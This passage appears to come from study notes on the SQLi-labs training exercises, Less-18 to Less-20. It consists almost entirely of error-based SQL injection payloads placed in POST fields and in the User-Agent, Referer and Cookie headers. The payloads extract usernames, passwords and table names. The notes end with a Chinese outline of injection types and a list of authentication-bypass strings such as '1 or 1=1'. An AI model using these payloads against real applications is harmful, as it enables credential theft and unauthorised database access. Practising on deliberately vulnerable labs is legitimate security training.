uname=admin&passwd=a' or extractvalue(1,concat(0x7e,(select*from(select concat_ws(0x7e,id,username,password)from users limit2,1)a)))--+&submit=Submit
Less-18:
User-Agent:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '
Less-19:
Referer:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users where username not in ('Dumb','Angelina')),0x7e)) and '
Less-20:
Cookie: uname=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tableswhere table_schema=database()),0x7e))-- #
SQL注入分类:可回显的注入:可以联合查询的注入报错注入通过注入进行DNS请求,从而达到回显的目的不可回显的注入:Bool盲注时间盲注二次注入万能语句:1 or 1=1 – #1’ or 1=1 – #1" or 1=1 – #1) or 1=1 – #1’) or 1=1 – #1") or 1=1 – #1)) or 1=1 – #1’) or 1=1-- #1") or 1=1-- #判断闭合:uname=1&passwd=1 or